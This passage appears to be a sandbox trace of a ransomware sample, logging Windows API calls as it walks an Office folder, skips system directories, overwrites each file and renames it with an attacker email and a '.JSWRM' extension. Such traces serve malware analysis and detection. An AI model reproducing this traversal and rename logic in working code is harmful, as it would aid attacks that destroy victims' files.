lpString2="documents and settings") returned 1 [0130.390] lstrcmpiW (lpString1="SIGNL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.390] lstrcmpiW (lpString1="SIGNL.ICO", lpString2="system volume information") returned -1 [0130.390] lstrcmpiW (lpString1="SIGNL.ICO", lpString2="msocache") returned 1 [0130.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGNL.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGNL.ICO", cchWideChar=9, lpMultiByteStr=0x345e870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGNL.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGNL.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGNL.ICO", cchWideChar=9, lpMultiByteStr=0x345e840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGNL.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SIGNL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\signl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.391] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.391] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.392] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.403] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.403] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.403] CloseHandle (hObject=0x314) returned 1 [0130.403] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SIGNL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\signl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SIGNL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\signl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.404] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SIGNS.ICO", cAlternateFileName="")) returned 1 [0130.404] lstrcmpiW (lpString1="SIGNS.ICO", lpString2=".") returned 1 [0130.404] lstrcmpiW (lpString1="SIGNS.ICO", lpString2="..") returned 1 [0130.404] lstrcmpiW (lpString1="SIGNS.ICO", lpString2="...") returned 1 [0130.404] lstrcmpiW (lpString1="SIGNS.ICO", lpString2="windows") returned -1 [0130.404] lstrcmpiW (lpString1="SIGNS.ICO", lpString2="recovery") returned 1 [0130.404] lstrcmpiW (lpString1="SIGNS.ICO", lpString2="perflogs") returned 1 [0130.404] lstrcmpiW (lpString1="SIGNS.ICO", lpString2="documents and settings") returned 1 [0130.404] lstrcmpiW (lpString1="SIGNS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.404] lstrcmpiW (lpString1="SIGNS.ICO", lpString2="system volume information") returned -1 [0130.404] lstrcmpiW (lpString1="SIGNS.ICO", lpString2="msocache") returned 1 [0130.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGNS.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGNS.ICO", cchWideChar=9, lpMultiByteStr=0x345e870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGNS.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGNS.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGNS.ICO", cchWideChar=9, lpMultiByteStr=0x345e840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGNS.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SIGNS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\signs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.405] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.405] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.405] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.408] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.408] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.408] CloseHandle (hObject=0x314) returned 1 [0130.408] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SIGNS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\signs.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SIGNS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\signs.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.409] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x280, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SMIMEE.CFG", cAlternateFileName="")) returned 1 [0130.409] lstrcmpiW (lpString1="SMIMEE.CFG", lpString2=".") returned 1 [0130.409] lstrcmpiW (lpString1="SMIMEE.CFG", lpString2="..") returned 1 [0130.409] lstrcmpiW (lpString1="SMIMEE.CFG", lpString2="...") returned 1 [0130.409] lstrcmpiW (lpString1="SMIMEE.CFG", lpString2="windows") returned -1 [0130.409] lstrcmpiW (lpString1="SMIMEE.CFG", lpString2="recovery") returned 1 [0130.409] lstrcmpiW (lpString1="SMIMEE.CFG", lpString2="perflogs") returned 1 [0130.409] lstrcmpiW (lpString1="SMIMEE.CFG", lpString2="documents and settings") returned 1 [0130.409] lstrcmpiW (lpString1="SMIMEE.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.409] lstrcmpiW (lpString1="SMIMEE.CFG", lpString2="system volume information") returned -1 [0130.410] lstrcmpiW (lpString1="SMIMEE.CFG", lpString2="msocache") returned 1 [0130.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMIMEE.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMIMEE.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMIMEE.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMIMEE.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMIMEE.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMIMEE.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SMIMEE.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\smimee.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.410] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=640) returned 1 [0130.410] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.410] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x280, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x280, lpOverlapped=0x0) returned 1 [0130.411] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.411] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x280, lpOverlapped=0x0) returned 1 [0130.412] CloseHandle (hObject=0x314) returned 1 [0130.412] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SMIMEE.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\smimee.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SMIMEE.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\smimee.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.415] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29c, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SMIMES.CFG", cAlternateFileName="")) returned 1 [0130.415] lstrcmpiW (lpString1="SMIMES.CFG", lpString2=".") returned 1 [0130.415] lstrcmpiW (lpString1="SMIMES.CFG", lpString2="..") returned 1 [0130.415] lstrcmpiW (lpString1="SMIMES.CFG", lpString2="...") returned 1 [0130.415] lstrcmpiW (lpString1="SMIMES.CFG", lpString2="windows") returned -1 [0130.415] lstrcmpiW (lpString1="SMIMES.CFG", lpString2="recovery") returned 1 [0130.415] lstrcmpiW (lpString1="SMIMES.CFG", lpString2="perflogs") returned 1 [0130.415] lstrcmpiW (lpString1="SMIMES.CFG", lpString2="documents and settings") returned 1 [0130.415] lstrcmpiW (lpString1="SMIMES.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.415] lstrcmpiW (lpString1="SMIMES.CFG", lpString2="system volume information") returned -1 [0130.415] lstrcmpiW (lpString1="SMIMES.CFG", lpString2="msocache") returned 1 [0130.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMIMES.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMIMES.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMIMES.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMIMES.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMIMES.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMIMES.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SMIMES.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\smimes.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.416] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=668) returned 1 [0130.416] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.417] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x290, lpOverlapped=0x0) returned 1 [0130.417] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.417] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x290, lpOverlapped=0x0) returned 1 [0130.418] CloseHandle (hObject=0x314) returned 1 [0130.418] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SMIMES.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\smimes.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SMIMES.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\smimes.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.420] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SMSL.ICO", cAlternateFileName="")) returned 1 [0130.420] lstrcmpiW (lpString1="SMSL.ICO", lpString2=".") returned 1 [0130.420] lstrcmpiW (lpString1="SMSL.ICO", lpString2="..") returned 1 [0130.420] lstrcmpiW (lpString1="SMSL.ICO", lpString2="...") returned 1 [0130.420] lstrcmpiW (lpString1="SMSL.ICO", lpString2="windows") returned -1 [0130.420] lstrcmpiW (lpString1="SMSL.ICO", lpString2="recovery") returned 1 [0130.420] lstrcmpiW (lpString1="SMSL.ICO", lpString2="perflogs") returned 1 [0130.420] lstrcmpiW (lpString1="SMSL.ICO", lpString2="documents and settings") returned 1 [0130.420] lstrcmpiW (lpString1="SMSL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.420] lstrcmpiW (lpString1="SMSL.ICO", lpString2="system volume information") returned -1 [0130.420] lstrcmpiW (lpString1="SMSL.ICO", lpString2="msocache") returned 1 [0130.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMSL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMSL.ICO", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSL.ICO", lpUsedDefaultChar=0x0) returned 8 [0130.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMSL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMSL.ICO", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSL.ICO", lpUsedDefaultChar=0x0) returned 8 [0130.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SMSL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\smsl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.421] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=10134) returned 1 [0130.421] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.421] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2790, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x2790, lpOverlapped=0x0) returned 1 [0130.423] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.423] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x2790, lpOverlapped=0x0) returned 1 [0130.423] CloseHandle (hObject=0x314) returned 1 [0130.423] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SMSL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\smsl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SMSL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\smsl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.424] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4d4679, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8be, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SMSS.ICO", cAlternateFileName="")) returned 1 [0130.424] lstrcmpiW (lpString1="SMSS.ICO", lpString2=".") returned 1 [0130.424] lstrcmpiW (lpString1="SMSS.ICO", lpString2="..") returned 1 [0130.424] lstrcmpiW (lpString1="SMSS.ICO", lpString2="...") returned 1 [0130.424] lstrcmpiW (lpString1="SMSS.ICO", lpString2="windows") returned -1 [0130.424] lstrcmpiW (lpString1="SMSS.ICO", lpString2="recovery") returned 1 [0130.424] lstrcmpiW (lpString1="SMSS.ICO", lpString2="perflogs") returned 1 [0130.424] lstrcmpiW (lpString1="SMSS.ICO", lpString2="documents and settings") returned 1 [0130.424] lstrcmpiW (lpString1="SMSS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.424] lstrcmpiW (lpString1="SMSS.ICO", lpString2="system volume information") returned -1 [0130.424] lstrcmpiW (lpString1="SMSS.ICO", lpString2="msocache") returned 1 [0130.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMSS.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMSS.ICO", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSS.ICO", lpUsedDefaultChar=0x0) returned 8 [0130.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMSS.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMSS.ICO", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSS.ICO", lpUsedDefaultChar=0x0) returned 8 [0130.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) 